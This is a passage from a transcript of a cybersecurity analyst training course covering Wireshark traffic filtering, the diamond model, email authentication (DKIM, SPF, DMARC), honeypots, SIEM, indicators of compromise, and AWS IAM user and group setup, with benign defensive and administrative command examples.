it using graphs. The key with a lot of network traffic analysis tools is
placement. Are you placing it where it can see all of the network traffic it needs to see? Now, you can also
analyze traffic using tools like Wireshark, so packet sniffers. And you can save the capture file, so that you can
analyze it at a later time or you can forward it off to someone with the expertise and ability to analyze it. And
there are even some free websites, where you can upload a packet capture file and it will identify any
anomalies.
Now bear in mind, identifying an anomaly is really specific to an organization and how they use their network.
But there are some general things that can be looked at to determine that it's abnormal or suspicious activity.
So identifying suspicious activity is a big part of network traffic analysis. It's not only that, but it's also to make
sure that the network is performing as best as it can. We don't want to have a lot of unnecessary network traffic
if we don't need to have it there. Now we've already stated that you can save network traffic to a capture file
for later analysis, but you can also capture it and have it analyzed live. Now, usually, we'll use automated
solutions to do this, but technically you could, as a network analysis expert, capture traffic and analyze it as it
comes in.
[Video description begins] Packet Header Analysis. A screenshot of a window called "malware.pcap" is
displayed. [Video description ends]
Now, this means having a strong understanding of packet headers and the OSI seven-layer conceptual model.
In this example, we are looking at a packet capture in the free Wireshark tool. And so we can see that we have
a number of packet headers in the middle section. We can see the Ethernet2 header, that shows us the source
and destination MAC addresses. The first part of the MAC address might be prefixed with a vendor name like
Cisco or Dell, because the first three octets of the MAC address identify the vendor.
After that, we see in this case, this particular selected packet that we have an IP or Internet Protocol version 4
header. And there are many pieces of information in there, including towards the bottom of that header, the
Source and Destination IP addresses. Then we can see after that based on the specific transmission, if we look
at the first highlighted packet here at the top, it's a DNS packet. So DNS queries use UDP, that's the transport
mechanism for layer 4 of the OSI model. So User Datagram Protocol then is another header we see here with a
Source and a Destination port. So here the destination port is 53, that's DNS query traffic on its way to a DNS
server. So it's important to be able to look at these types of things to analyze network traffic. You have to know
what you're looking at.
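If you prefer the command line, the same kind of inspection can be done with tshark, the terminal version of Wireshark; a minimal sketch using the capture file name shown in this example:

tshark -r malware.pcap -Y "dns" -c 10

The -r option reads the saved capture file, -Y applies a display filter so only DNS packets are shown, and -c 10 limits the output to the first ten matching packets.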
[Video description begins] Intrusion Analysis: The Diamond Model. [Video description ends]
The other thing to think about when you're analyzing traffic is determining whether an intrusion is taking place
or not. And something that can help with that is the diamond model. It is a framework for intrusion analysis. It
starts by looking at the adversary, who is the adversary? Is it someone on the inside of the network, someone
on the outside? Now, even if you know how to analyze network traffic to say that a transmission came from
inside the network because of the TTL, or time to live, in the IP header, well, that is easily forged with
freely available tools. So we have to take what we're looking at in network traffic analysis with a grain of salt
with the understanding some of that traffic could have been forged or spoofed.
The next part of the diamond model is looking at infrastructure. So what are they trying to compromise or do
we have someone that's scanning every host on the network using some kind of a port scanning tool like
nmap? Or are they focusing on an individual host, maybe trying to exploit previously discovered
vulnerabilities? We have to look at the tactics or the techniques that the potential attackers are using. So besides
reconnaissance, what tools are they using, and are they trying to break into perimeter devices and then
move laterally through the network to access other devices? And then finally, of course,
we have to look at the victim device or network that was targeted. Why was it targeted? You can even use the
diamond model to analyze how social engineering attacks with phishing emails actually occur and might be
used to deliver ransomware.
In this video, you will learn how to filter captured network traffic.
Objectives
[Video description begins] Topic title: Wireshark Traffic Filtering. The presenter is Dan Lachance. [Video
description ends]
Using Wireshark to capture network traffic is very useful so that we can learn about what's on the network.
Which in turn could tell us what perhaps should not be on the network any longer. It also allows us to identify
traffic patterns, potentially identify any security issues, such as intrusions on the network. It allows us to
increase the performance of the network and so on. So we can either filter traffic as it's captured, or filter it
after it's been captured, which is then called a display filter as opposed to a capture filter.
Here in Wireshark, I've already got a specific packet capture opened up, so we can see each line of course is a
packet.
[Video description begins] He points to the first section. It includes a table with seven columns and several
rows. The column headers are: No., Time, Source, Destination, Protocol, Length, and Info. [Video description
ends]
And when we select one of those packets in the middle, we can see the packet headers.
[Video description begins] He points to the second section. [Video description ends]
And of course, as we go through and select parts of the packet headers, we can see what's being selected down
below, through to the eventual payload stored within the packet.
[Video description begins] He points to the third section. [Video description ends]
Now, filtering out this information is going to be important because notice as I scroll through, there's quite a
bit of information here. So what we can do then is start applying a display filter at the top in the address bar
where it says, Apply a display filter.
[Video description begins] He scrolls down in the first section. [Video description ends]
And we can start with easy stuff, for example if I want to only see arp or Address Resolution Protocol traffic, I
can simply type arp, press Enter. And notice that we've now filtered the list to only show us arp traffic.
[Video description begins] He points to the first section. [Video description ends]
[Video description begins] He selects a row with a row entry “Motorola_88:f1:59” under the Source column
header. The corresponding details are displayed in the second section. [Video description ends]
And we can see in the packet headers, we've got the Ethernet frame with the broadcast of all f's in hex.
[Video description begins] He expands a section called "Ethernet II”. [Video description ends]
So broadcast at the MAC address level layer two of the OSI model.
[Video description begins] He points to the following text: "Destination: Broadcast (ff:ff:ff:ff:ff:ff)". [Video
description ends]
In parentheses you see the full hex value of that source MAC address. But the first three portions of that hex
address identify the vendor, in this case Motorola.
[Video description begins] He points to the following text: "5c:51:88". [Video description ends]
So that's why you've got these two variations of the source MAC address. And after that, you can see the
address resolution protocol or ARP header with some of the details here.
[Video description begins] He expands a section called "Address Resolution Protocol (request)". The details
include: hardware type and protocol type. [Video description ends]
Notice there's no IP header. What that means is that ARP is a local area network protocol, it doesn't work
across routers. But we can also filter based on other types of traffic. So for example, if I'm interested in HTTP
type of traffic I could specify that.
[Video description begins] He enters http in the address bar. The corresponding details are displayed in the
first section. [Video description ends]
And now we're filtering the list to only see HTTP communications, so we can see the Source and Destination
IP addresses. Of course, in this case, we know the protocol is HTTP, that's what we filtered on. And then we
have a little bit of detail or info about the type of transmission. Of course, if you want to learn more about the
transmission, you should be looking in detail at the appropriate packet headers.
[Video description begins] He points to the second section in the content pane. [Video description ends]
Such as the TCP header, or perhaps the HTTP header, or whatever the case might be to actually see what's
happening. And notice, we can actually see some clear text here.
[Video description begins] He points to the third section in the content pane. [Video description ends]
This is not an encrypted transmission. Now, we can also filter on things like addresses. For example, ip.addr,
and I could put in a double equal sign. And if I want to filter on a particular IP address, so 192.168.4.24, then I
could put that in and press Enter. And now I'm filtering only on that IP address, whether it's the Source or
Destination. You can also specify Source and Destination. But here, I've simply specified ip.addr or address.
So again, notice the use of the double equals sign. Now, I could take that a step further, because notice here
that I've got a lot of transmissions here that are not specifically HTTP.
[Video description begins] He points to the first section in the content pane. [Video description ends]
So we can start to put conditions together using the &&, so maybe http, so &&http, press Enter.
[Video description begins] He enters ip.addr==192.168.4.24&&http in the address bar. The corresponding
details are displayed in the first section. [Video description ends]
So now, not only am I filtering on that specific IP address. But also only for HTTP transmissions on the
network. So the list is much smaller as we can see. Now, you can also click the Expression button over on the
far right of the address bar, where you can start to put together your filters.
[Video description begins] The corresponding dialog box opens. [Video description ends]
We've got a number of protocols that are listed here. So notice for example, if I were to choose something,
well, it could be anything. Let's say we were to choose the Address Resolution Protocol or ARP. So why don't
we go back up in the list a little bit. There it is, ARP, and here we can see we've got a number of items here.
So we can see the Destination hardware MAC address or the target MAC address. If I were to select that, it
adds it at the bottom. So arp.dst for Destination, .hw_mac, hardware MAC address. And then I can choose
whether it's present, whether it equals something, whether it does not equal something, is greater than or less
than, contains, matches, and so on. And then I can put in a value, and notice it's constructing it as I click on
items in the screen.
[Video description begins] He points to the value displayed at the bottom. [Video description ends]
So let's say I'm going to scroll down here and I'm going to say arp.source, I'm looking at the source MAC
address, source hardware MAC address.
[Video description begins] From the list, he selects an option called “arp.src.hw_mac · Sender MAC
address”. [Video description ends]
So let's see, source hardware MAC address, right here, Sender MAC address.
[Video description begins] He selects the “!=” option in a section called “Relation”.[Video description ends]
Let's say I want to say not equal to, and I'll just put in a value here, in this case a MAC address, so we can see
that that is shown.
[Video description begins] He enters the text: “74:83:c2:96:5d:ed” in a text box called “Value (Ethernet or
other MAC address)”. [Video description ends]
[Video description begins] He points to the following text at the bottom: "arp.src.hw_mac !=
74:83:c2:96:5d:ed". [Video description ends]
[Video description begins] He clicks a button called "OK" and the dialog box closes. [Video description ends]
When really, I want that to be the only expression, arp.source hardware MAC address not equal to, and we've
got a specific value here.
[Video description begins] He points to the address bar. [Video description ends]
So when I press Enter, we can see that we've filtered everything out.
[Video description begins] He removes the other text and points to "arp.src.hw_mac != 74:83:c2:96:5d:ed" in
the address bar. [Video description ends]
Basically, we're seeing any transmissions that do not include the MAC address that is specified here.
So of course, I can just click the X over here or delete everything to remove all filters.
[Video description begins] He clicks the “X” button adjacent to the address bar. [Video description ends]
Now what we can also do, let's see. Why don't we filter on HTTP? Let's filter on HTTP. And I've got the first
packet selected. We can also go to the Analyze menu and choose Follow, TCP Stream.
[Video description begins] He selects a menu called "Analyze" and selects a menu option called "Follow". He
further selects an option called "TCP Stream" from the flyout. The corresponding dialog box opens. [Video
description ends]
So instead of going through each and every individual packet in that session, it puts it together and makes it a
little bit easier to read here. So we can see that there's not much that was encrypted, a lot of it was sent in clear
text. Now, I'm going to close out of that. And finally, one of the other things we should know about filtering,
let's just remove our filter here, is that we can search. So if I choose Edit, Find Packet, I could choose, for
example, the Packet details.
[Video description begins] A new bar is displayed below the address bar. It includes drop-down list boxes
called “Packet details”, “Narrow & Wide”, and "String”. [Video description ends]
And I'm not going to turn on case sensitivity, but I'm going to look for a string, in this case authentication. And
I'll click Find, and it's found authentication down here in the payload.
[Video description begins] He points to the third section in the content pane. [Video description ends]
So it stopped at that packet. Now I'll click Find again, it goes to the next packet, and so on. So essentially, you
can search for things quickly when you've captured network traffic and you're analyzing it. And you can also
filter out the things that may not be of interest.
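To recap the display filter syntax used in this demonstration, here are the expressions from this video plus one additional common example, using the sample IP and MAC values from this capture:

arp
http
ip.addr == 192.168.4.24
ip.addr == 192.168.4.24 && http
arp.src.hw_mac != 74:83:c2:96:5d:ed
tcp.port == 443

The first shows only ARP traffic, the second only HTTP, the third any packet to or from 192.168.4.24, the fourth combines both conditions, the fifth excludes frames sent from a particular MAC address, and the last, an extra example, matches TCP traffic on port 443 in either direction.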
Upon completion of this video, you will be able to list common items to look for when monitoring an e-mail
ecosystem.
Objectives
list common items to look out for when monitoring an e-mail ecosystem
[Video description begins] Topic title: E-mail Monitoring. The presenter is Dan Lachance. [Video description
ends]
Even in this day and age of social media and tweeting or snapchatting, email still remains crucial for
organizations. Monitoring email is important when it comes to your organization's security posture. We're
talking here about what to look for in email for suspicious indicators, and then countermeasures that can be
applied to reduce their impacts. First of all, looking at malicious payloads, how do we know that we might have
a malicious payload in an email message? Well, one way would be to have intrusion detection systems analyzing
packet payloads looking for known problems in email or known malware. However, that's not always the most
efficient way to do things. Also looking for embedded links in email, users must have an awareness that they
shouldn't just be clicking on links provided in email messages even if the email looks legitimate.
For example, if the tax department sends you an email message saying, you need to pay up or you're going to
jail, click here to pay. That's not the way to go about it. What you would really do is sign into your online tax
account outside of that email, and then check to see if there is in fact a notification from the tax department or
call them up. We want to make sure people aren't easily fooled by these types of potentially scary phishing
scams. File attachments have long been known to be a great delivery vehicle for malware. So it's important that
there is an awareness of not opening up file attachments and being very selective. Problem is that malicious
users know this. And they'll often craft email messages that look like they would have been legitimately sent to
somebody, such as making it look like it came from a supplier, here's an invoice based on last week. And you
might have actually purchased something from your supplier last week. And many malicious users will
perform reconnaissance. They're going to do their homework to learn about these items, these circumstances,
to make the message more believable and trick people. So if it sounds like there aren't a lot of
perfect solutions at the technical level to prevent malicious payloads, that would be correct. The biggest part of
it is the human element. It's important that people be suspicious and cynical about anything they receive in
email. Then we have Domain Keys Identified Mail, DKIM.
Now, DKIM is really about email digital signatures, which provide an assurance that the message is authentic. And
this is transparent to users unless there is a problem and it can't be verified. When you digitally sign an email
message, you would do that for important messages. What's happening is your mail system is retrieving your
private key. You have to have been issued a public and private key pair where the keys are related. Your
private key is used to generate a digital signature. And then the message is sent on its way, but nothing's
encrypted. There's no confidentiality. This is all about message authenticity at this level. When the recipient
opens that message, the mail software will detect that it's digitally signed. It will find the mathematically related
public key and verify that the signature is authentic. So recipients must have your public key to verify the digital
signature that you've created on your end with a private key. Then there's email monitoring in the sense of the
sender policy framework or SPF.
Now, this is related to domain based message authentication, reporting, and conformance, otherwise called
DMARC. That one's quite a mouthful. So DMARC is used in email systems and it references the Sender
Policy Framework, and also digitally signed email messages to determine if the message seems authentic or if
it seems like it was completely spoofed or forged. So that's what that's about. The idea is to try to reduce the
occurrence or the impact of phishing scams. And also impersonation, such as checking the email address of the
message. If you get an email message that looks like it came from Acme Bank Incorporated but yet the email
address has no reference to that in the name, then it probably is not authentic. But oftentimes, we don't want
just users to look at this and make that decision. We also want, in addition to that, to include technical
solutions that will be able to determine those things.
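One practical check is to query the DNS TXT records a domain publishes for SPF, DKIM, and DMARC; this is a sketch using a placeholder domain and DKIM selector:

dig +short TXT example.com                       # SPF record, starts with v=spf1, lists hosts allowed to send mail for the domain
dig +short TXT selector1._domainkey.example.com  # DKIM public key that recipients use to verify digital signatures
dig +short TXT _dmarc.example.com                # DMARC policy record, starts with v=DMARC1, tells receivers how to handle failures

If a message claims to come from a domain but fails these checks, that's a strong indicator of spoofing or phishing.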
[Video description begins] Topic title: Honeypots. The presenter is Dan Lachance. [Video description ends]
Most people that have a sweet tooth love honey. Well, in our discussion a honeypot is made to look like a
sweet target for an attacker. So a honeypot mimics a production system and/or sensitive data. Now this can be
configured to appear vulnerable. The idea is that we want to essentially attract malicious activity so we can
learn more. So honeypots have pros and cons, and you have to carefully weigh these when determining if
you're going to deploy a honeypot solution. The pro, or the benefit of a honeypot begins with early incident
detection. So let's say that you deployed a virtual appliance that looks like a vulnerable web server. Well, by
doing that, before you deploy that same web server for real in production, you can start to learn about what
types of attacks might happen against that site before you have a real life system.
So you can learn about attack patterns, attack vectors, so what aspect of the web server stack will be attacked,
it might be just a component that's used to add functionality to the website. You can even potentially learn
about attacker identities, such as the location of the attack is coming from. But the reality is it's pretty easy for
attackers to remain anonymous, especially when it comes to the dark net and using different types of
addressing superimposed on top of the traditional Internet. It can make it very difficult to see where an attack
is really coming from. What are some of the cons or some of the negative aspects of deploying honeypots at
the IT level? Well there's legal liability, where you might scratch your head and say what do you mean by that,
you're deploying something that's not real.
Yes, but you need to be very careful. You want to make sure that you don't mistakenly include some actual real
data that's sensitive. You don't want to violate, for example, any patient rights regarding sensitive medical data.
So, you'll always use fake data on a honeypot. The other thing to think about though, not just that, but let's say
that you've got a honeypot and you've done your due diligence to make sure only fictitious data is on it, but
then it gets compromised.
Okay, well, I kind of expect that on a honeypot, because that's sort of what I'm trying to make it look like, a
vulnerable host, perhaps. Yes, but you have to be careful because what if that machine is compromised, and
then gets used for other illegal activity. Such as your machine becoming a zombie in a botnet that's part of a
distributed denial of service attack. That's not good. So we need to be very, very diligent and careful with how
we deploy honeypots and how long they stay up and running, and we have to make sure we monitor them
continuously.
[Video description begins] Honeypot Configurations. [Video description ends]
Honeypots can be configured to appear as a specific server operating system, whether it's a UNIX variant, a
Linux variant, a Windows variant, or even some kind of industrial control system operating system variant like
VxWorks. It can be configured to look like a specific service that's up and running, whether it's a web server,
an NTP time server, a DNS name resolution server, an SMTP mail server, the list just goes on and on and on,
anything you can think of. We could even have individual files or folders that are made to appear vulnerable.
Now we can have a HoneyDrive honeypot.
HoneyDrive is a tool that lets us deploy a honeypot as a Linux based virtual appliance. So it's a virtual
machine. And we can enable it as an SSH honeypot. So it looks like it's an SSH host that might be vulnerable.
That would be useful if we are curious about learning about how an SSH exposed port might be attacked on
our network. You could also set up a website honeypot to look like a real website when in fact, it is not and it
most certainly does not contain any real sensitive data. So working with honeypots means being very diligent
with your monitoring and analytical tools to capture the activity of malicious users, whether they're just
performing reconnaissance, or actually attempting to exploit discovered vulnerabilities.
So we need to have some kind of real-time monitoring solution in place. We should have log forwarding
enabled because if the honeypot itself is compromised, then the logs could be tampered with or compromised.
We want log information to be forwarded immediately as it occurs to another safe location. We have to think
about the placement of the honeypot. For example, do you want to mimic what would happen to an open SSH
port that's exposed to the Internet? If that's the case, you should consider placing the honeypot in a
demilitarized zone, or DMZ, that is exposed directly to the Internet. You then have to determine whether
you're going to use a physical honeypot configuration, a physical server, or a virtual machine appliance
solution.
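On a Linux-based honeypot that uses rsyslog, that kind of log forwarding can be as simple as one extra line in the rsyslog configuration; this is a sketch, and the collector's IP address is a placeholder:

*.* @@192.0.2.10:514

The *.* selector matches every facility and severity, and the double @@ forwards over TCP to port 514 on the collector (a single @ would use UDP), so after restarting the rsyslog service a copy of each log entry leaves the honeypot immediately, even if the local logs are later tampered with.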
After completing this video, you will be able to recognize how SIEM provides centralized security event
monitoring and management.
Objectives
recognize how SIEM provides centralized security event monitoring and management
[Video description begins] Topic title: SIEM. The presenter is Dan Lachance. [Video description ends]
Most security analysts are probably suffering from alert fatigue, seeing too many incoming false positives
about security incidents that just aren't occurring.
[Video description begins] Security Information and Event Management (SIEM). [Video description ends]
What can we do about this? Well in a larger enterprise, a security information and event management or SIEM
system deals with real-time security alerts. And those security events can come from a multitude of sources.
So, SIEM is a centralized security incident type of solution. But we have to be careful about the configuration
for event analysis and correlation perhaps with other related events that could indicate that there's some kind of
suspicious activity taking place.
SIEM data sources include web applications; network infrastructure equipment, like unified threat
management solutions, packet filtering firewalls, proxy servers, and intrusion detection sensors; databases, in
other words, any database log events related to security; shared folders; and authentication servers. So you have a
number of different ways that the centralized SIEM solution can receive data to analyze, looking for security
incidents.
Now the configuration of a SIEM solution is going to be different from one organization to the next. And the
reason is because every organization has a different deployment in their IT ecosystem of servers and routers
and firewalls, and web application servers. It's all different, and also there's different tolerance for risk, and
what's normal in one active environment for one company might be considered abnormal in a different
company. You need to tweak your SIEM solution. It needs to be tweaked for what's normal in your
environment. By doing this, you can reduce false positives. This feeds back into security technicians suffering
from alert fatigue. They keep getting alerts about things that just aren't real incidents, and we want to reduce that.
So we need to have a baseline of what's normal before we can identify what's abnormal, and that's where the
tweaking and configuration for your specific network kicks in. There are times when your SIEM solution will
also need to be compliant with certain laws and regulations, such as ensuring that you are using an acceptable
encryption cipher and a key length. Or that you've got alert thresholds configured appropriately to be
compliant with certain security standards. For example, requiring accounts be locked out after three incorrect
login attempts. So you might tweak your SIEM configuration in accordance with those types of items. Because
do you really want a notification after two incorrect login attempts if that's not how your environment is
configured? Probably not. So it's important to tweak your SIEM configuration.
Upon completion of this video, you will be able to recognize how to filter out noise to identify suspicious
activity.
Objectives
recognize how to filter out noise to identify suspicious activity
[Video description begins] Topic title: Indicators of Compromise. The presenter is Dan Lachance. [Video
description ends]
Security solutions that are designed to alert technicians of abnormal activity do so by seeking indicators of
compromise, otherwise called IoCs.
The idea is to filter out irrelevant data. Filter out all of the background noise and try to focus on what's strange.
So if we've got a device on the network today that wasn't there yesterday, and this is not a guest network.
Perhaps this is an infrastructure only network segment that contains storage arrays. Why is there a new device
on that network today? Should it be there or should it not be there? So we need to be able to filter that out
based on what's normal, in that case, for that specific network segment. So we're talking about identifying
suspicious activity. Suspicious activity could even be as simple as abnormal performance spikes, like abnormal
CPU utilization or some kind of a service interruption. As in, this internal line-of-business web app never goes
down, or if it does, it's for a known reason. So why is it abnormally going down at this point during the day?
Could it be because it's overwhelmed with user requests? The only way you can answer those questions and
come up with anything intelligent is to find out what is normal based on how we use that IT solution.
So indicators of compromise come in many, many different flavors. It could be abnormal traffic patterns on the
network. Abnormal traffic, well, what does that mean? Well, maybe it's not normal for dozens of stations on a
network in the middle of the night to send outbound traffic to the same host over port 443. That might indicate
that we've got infected computers reaching out to a command and control server. Essentially, those machines
will be part of a botnet under singular malicious user control. We might have rogue network devices, as we
identified a moment ago, where we might have new devices on the network that normally aren't there and
shouldn't be there. Or maybe we've got an Apple iOS device on the network and that's not used at all in the
company. And BYOD or bring your own device is not supported by the organization.
So why all of a sudden do we have Apple iOS devices on the network? It doesn't make sense. I should be
suspicious. Non-standard port usage, a port identifies a network service. So why might we have a different port
number being used for a different service? In other words, why might we have HTTP traffic being funneled to
a host out on the Internet, maybe on some abnormal port other than 80 or 443? It could be to hide that type of
traffic. Do we have excessive outbound traffic? Again, what's excessive? You have to know what's normal
before you can determine what's excessive or not. Same with CPU utilization or the amount of RAM being
used.
The creation of new user accounts could be an indicator of compromise if that wasn't done in accordance with
organizational security policies. It could be an attacker that's compromised a system and is creating a backdoor
account. File and registry changes are always suspicious when not specifically allowed or made by a user.
Could be malware that's made that change. So there are many different types of indicators of compromise. And
it's important that we filter out the noise to focus on potentially real indicators of compromise so that we can
put in motion an incident response plan as quickly as possible.
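As one small example of hunting for the abnormal outbound traffic mentioned above, a Linux host's established connections to port 443 can be listed with the ss utility; what counts as suspicious still depends on your baseline:

ss -tn state established '( dport = :443 )'

The -t option limits output to TCP sockets, -n skips name resolution, and the state and port filter keeps only established connections whose destination port is 443; unexpected destinations, especially outside business hours, are worth investigating.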
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined the use of centralized threat monitoring. And how it can be used to identify
suspicious activity and help reduce incident response time. We did this by exploring the relationship between
continuous monitoring and quick security incident response times, as well as the relevance of common log types.
looked at how to view cloud based audit events and how to send Linux log events to a centralized logging host.
We looked at how to perform Windows event log filtering and how to configure cloud-based alarms. Then we
took a look at how the OSI model layers relate to communications hardware and software. We looked at what
to watch out for when analyzing network traffic and an email ecosystem. We looked at where to use honeypots
to monitor malicious activity. We looked at how SIEM provides centralized security event monitoring and
management. And finally, we looked at how to identify suspicious activity by filtering out all of the noise.
In our next course, we'll move on to explore user account security, including how to configure user accounts to
help maximize authentication and authorization security for both on-premises and cloud-based users, groups,
and roles.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance. He is an
IT Trainer / Consultant. [Video description ends]
Hi I am Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer,
as a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, Cloud Solutions, Linux management, and configuration and troubleshooting
across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst or CYSA Plus
certification exam is designed for IT professionals looking to gain security analyst skills to perform data
analysis, to identify vulnerabilities, threats and risks to an organization, to configure and use threat detection
tools and secure and protect an organization's applications and systems. In this course, we're going to explore
the configuration of user accounts for on-premises and cloud-based users, groups and roles to maximize
authentication and authorization security. I'll start by examining the role of identity and access management,
otherwise called IAM, in securing IT environments. And I'll demonstrate how to create IAM users, groups and
roles in Amazon Web Services, AWS. I'll then show how to configure user permissions policies in AWS. I'll
deploy simple Active Directory in AWS, and also join a cloud virtual machine to a cloud-based directory
service. Next, I'll explore how multi-factor authentication, otherwise called MFA, enhances sign in security,
and I'll demonstrate how to enable IAM user MFA. Lastly, I'll examine the role of identity federation across
organizations. And I will demonstrate how to set permissions for both Windows and Linux systems.
[Video description begins] Topic title: Identity and Access Management. The presenter is Dan
Lachance. [Video description ends]
Securing resources in a network environment means dealing with Identity and Access Management, otherwise
called IAM. This means creating and managing user accounts and controlling their access to resources.
Perhaps adding users to groups with similar needs and granting permissions to groups, or even using roles. A
role is another entity that usually represents a software component that needs permissions to something. So it
could be a front-end web application, for example, that needs access to a back end database to perform queries
or to write to that database. IAM deals with authentication and authorization. Authentication happens first, it's
proof of identity. Single-factor authentication uses a single authentication category to prove identity. Single-
factor might include username and password. It's two items, but they're in the same category, something you
know, hence it is single-factor authentication. Multi-factor authentication uses items or factors from different
categories. So we already know that the username and password are single factor, there's something you know.
However, a smartcard is something you must physically have in your possession. You might even need to
know a pin to use that smartcard. That's something you know, but you must possess the smartcard. So the
combination of username, password, and smartcard then in this example, constitutes multi-factor
authentication. Authorization as we know occurs after successful authentication. It really determines what level
of access an entity has to a given resource, whether that resource is an entire server, a file, a folder, a database,
anything like that. So it's controlled access to apps and network resources. Now you can also configure policies
depending on your IAM solution that collect permissions together that you assign to users, groups or roles.
You might even build custom policies that you assign that have specific permission sets that align with
business objectives.
[Video description begins] Custom or built-in policies assigned to users, group, roles. [Video description
ends]
Now identity and access management begins with an account request. This might even be automated as part of
employee onboarding. So when a new employee is hired, part of the process that gets triggered is the creation
of a user account. Now the request would be followed by the actual account creation, and then the enforcement of
user access. Now the enforcement part might kick in with the configuration of multi-factor authentication.
Again, that entire process can be automated in a workflow as part of new employee onboarding. The other
thing, though, that might not be an automatable type of action would be to make sure users are aware of
acceptable use policies. And part of your employee onboarding should always include what to watch out for in
terms of security, security training about scams, about how security is applied within the organization and so
on. The next part of the identity and access management life cycle is the logging, auditing and reporting based
on user activity. Also, it can be done at the group and role level. And then there's the eventual removal of an
account such as when a user leaves the organization. Or in some cases, your organizational policies might not
dictate that the account get removed but rather disabled and kept for a period of time.
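That lifecycle can also be scripted. As a minimal AWS CLI sketch, with hypothetical user, group, and policy names, account creation, group membership, permission assignment, and eventual disabling of sign-in might look like this:

aws iam create-user --user-name jsmith
aws iam create-group --group-name Admins_Group
aws iam add-user-to-group --user-name jsmith --group-name Admins_Group
aws iam attach-group-policy --group-name Admins_Group --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess
# later, as part of offboarding, console sign-in can be removed without deleting the account outright:
aws iam delete-login-profile --user-name jsmith

Whether the account is eventually deleted or just disabled in this way would depend on the organizational policy mentioned above.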
In this video, you will learn how to create cloud identities in Amazon Web Services.
Objectives
[Video description begins] Topic title: Creating Cloud IAM Users and Groups. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'm going to create a Cloud IAM user and group in Amazon Web Services.
[Video description begins] A window labeled "AWS Management Console" opens. It includes a section labeled
"AWS services", which further includes a search box labeled "Find Services". [Video description ends]
Here in the AWS Management Console, I'm going to search for IAM, and I'll click the result, which will take
me into the IAM Management Console.
[Video description begins] He types iam in the Find Services search box. The search result displays an IAM
link. He clicks the IAM link and a web page labeled "IAM Management Console" opens. [Video description
ends]
On the left, I'm going to start by creating a group. Here I've already got a number of groups.
[Video description begins] The IAM Management Console is divided into three parts: menu bar, navigation
pane, and content pane. The navigation pane includes various options labeled "Access management" and
"Access reports". The Access management option includes sub options labeled "Groups" and "Users". He
clicks the Groups sub option and its corresponding blade opens in the content pane. The blade includes a
button labeled "Create New Group" and a table with four columns and four rows. The column headers are
Group Name, Users, Inline Policy, and Creation Time. He clicks the Create New Group button and a wizard
labeled "Create New Group" opens in which a page labeled "Set Group Name" is displayed. [Video
description ends]
I'm going to create a new one by clicking the Create New Group button and it's going to be called
East_Admins_Group, and I'm going to click Next Step.
[Video description begins] The Set Group Name page contains a text box labeled "Group Name". He types
East_Admins_Group in the Group Name text box. Then he clicks a button labeled "Next Step". A page labeled
"Attach Policy" opens. [Video description ends]
Now we can attach a policy here in Amazon Web Services to this group. A policy is nothing but a collection of
related permissions.
[Video description begins] He points to a filter box labeled "Policy Type". [Video description ends]
For example, Amazon S3, Simple Storage Service is cloud storage. And if we wanted to allow read-only
access to Amazon S3, well, we could turn on that policy. You can also build custom policies or not attach a
policy at all, at least at this point in time, which is what I'm going to elect to do, no policy association.
[Video description begins] The Attach Policy page includes a table with three columns and multiple rows. The
column headers of the table are Policy Name, Attached Entities, and Creation Time. He checks and then
unchecks a checkbox adjacent to the AmazonS3ReadOnlyAccess row entry under the Policy Name column
header. [Video description ends]
So I'll click Next Step. And I'm going to click the Create Group button in the bottom-right and there's our new
group East_Admins_Group.
[Video description begins] A page labeled "Review" opens. It displays Group name and Policies information.
Then he clicks a button labeled "Create Group" and the Create New Group Wizard closes. The Groups blade
displays. It includes a table with four columns and four rows. The column headers are Group Name, Users,
Inline Policy, and Creation Time. He points to the East_Admins_Group row entry under the Group Name
column header. [Video description ends]
Currently, it says there are 0 users in that group. I could always click on that group to open it up.
[Video description begins] He clicks the East_Admins_Group row entry and its corresponding blade opens. It
is divided into two sections. The first section is labeled "Summary". The second section contains three tabs
labeled "Users", "Permissions", and "Access Advisor". The Users tab is selected by default. [Video description
ends]
Now I could click the Add Users to Group button down here under the Users tab. I could also go to the
Permissions tab and attach a policy which is kind of the same screen we saw when we were creating this IAM
group.
[Video description begins] He clicks the Permissions tab which includes two sections labeled "Managed
Policies" and "Inline Policies". In the Managed Policies section, he clicks a button labeled "Attach Policy".
The Attach Policy page opens. Then he clicks a button labeled "Cancel" and the Attach Policy page
closes. [Video description ends]
I'm going to click on Users in the left and I'm going to create a new user account. Now we can see that we
already have users in existence here in Amazon Web Services. I'm going to go ahead and click the Add user button
to add a new one.
[Video description begins] He clicks the Users sub option in the navigation pane and its corresponding blade
opens in the content pane. It includes a button labeled "Add user" and a table with multiple columns and three
rows. The column headers include User name and Groups. He points to CBlackwell, JGold, and MBishop row
entries under the User name column header. He clicks the Add user button and the Add user wizard opens.
The first page is divided into two sections labeled "Set user details" and "Select AWS access type". [Video
description ends]
So I'm going to create a user here, Neil Parks, so NParks has been created, I could click Add another user and
add a couple of them all at once.
[Video description begins] In the first section, he types NParks in a text box labeled "User name". Then he
points to a link labeled "Add another user". [Video description ends]
Down below, from a security perspective, I need to determine what type of access this IAM user is going to require. Is it going to be programmatic access to AWS cloud resources? In other words, is this a person that will be given an access key and secret access key for the AWS account, which would allow them to use CLI (command line interface) commands or PowerShell cmdlets to deploy and manage cloud resources? Or I can give them AWS Management Console access, which is what I'm using right now. If this were an assistant administrator, that would make sense. So I'm going to go ahead and do that.
[Video description begins] In the second section, he checks a checkbox labeled "AWS Management Console
access". [Video description ends]
I'm going to turn on AWS Management Console access. And down below, we can have an Autogenerated
password or a Custom password. I'm going to leave it on Autogenerated password. I'm also going to leave the
option here where the user must create a new password at next sign-in. I'm just going to go ahead and click
Next: Permissions. And so just like when we were creating the group, we have to determine if we want this
specific user to have certain permissions. We can add the user to a group, so we can select the group here.
[Video description begins] He clicks a button labeled "Next: Permissions" and a page labeled "Set
permissions" displays. The Set permissions page contains three tiles labeled "Add user to group", "Copy
permissions from existing user", and "Attach existing policies". The Add user to group tile is selected and its
corresponding options are displayed which includes a button labeled "Create group" and a table with two
columns and four rows. The column headers are Group and Attached policies. [Video description ends]
